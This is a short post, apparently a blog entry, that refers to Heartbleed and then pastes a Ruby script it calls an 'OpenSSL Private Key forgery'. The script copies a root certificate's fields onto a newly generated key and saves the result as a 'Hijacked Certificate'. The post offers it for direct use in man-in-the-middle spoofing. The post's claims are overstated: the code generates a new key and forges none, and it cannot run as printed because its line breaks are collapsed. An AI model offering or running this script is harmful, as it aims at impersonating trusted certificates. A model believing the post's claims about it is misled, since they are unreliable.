Some time ago, openssl heartbleed surprised us for a few days.
From user data leakage to products around OpenSSL, from server to client, from https Private Key leakage to openvpn, openssh, sftp and other private key leakage. We can't do anything in many places.
Many users think that https is secure. Before that, there were various man-in-the-middle attacks.
I will also paste some code below for you to see. It is a Ruby OpenSSL Private Key forgery.
For the sake of social harmony, I will not talk about the specific usage. Use it directly if you can understand it...
require 'rubygems'require 'openssl'require 'digest/md5'key = OpenSSL::PKey::RSA.new(2048)cipher = OpenSSL::Cipher::AES.new(256, :CBC)ctx = OpenSSL::SSL::SSLContext.newputs "Spoof must be in DER format and saved as root.cer"raw = File.read "root.cer"cert = OpenSSL::X509::Certificate.new rawcert.version = 2ef = OpenSSL::X509::ExtensionFactory.newef.issuer_certificate = OpenSSL::X509::Certificate.new rawcert.subject = ef.issuer_certificate.subjectef.subject_certificate = ef.issuer_certificatecert.issuer = ef.issuer_certificate.issuercert.serial = ef.issuer_certificate.serialctx.key = ef.issuer_certificate.public_keycert.public_key = ef.issuer_certificate.public_keycert.not_after = ef.issuer_certificate.not_aftercert.not_before = ef.issuer_certificate.not_beforecert.extensions = ef.issuer_certificate.extensionsa = File.open("root"".key", "w")a.syswrite("#{cert.public_key}")a.syswrite("#{key.to_pem}")spoof = OpenSSL::PKey::RSA.new File.read 'root.key'printf "Verifying Keys Work: "puts spoof.private?ctx.cert = ef.issuer_certificateputs "============================================================="root = ef.issuer_certificate.sign(spoof, OpenSSL::Digest::SHA1.new)filer = File.open("#{cert.serial}"".key", "w")filer.syswrite("#{spoof.to_pem}")file = File.open("spoof"".cer", "w")file.syswrite("#{cert.to_der}")files = File.open("#{cert.serial}"".pem", "w")files.syswrite("#{cert.to_pem}")files.syswrite("#{spoof.to_pem}")puts "Hijacked Certificate with chainloaded key saved @ #{cert.serial}.pem"printf "Verifying Keys Intergity: "puts root.verify(key)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
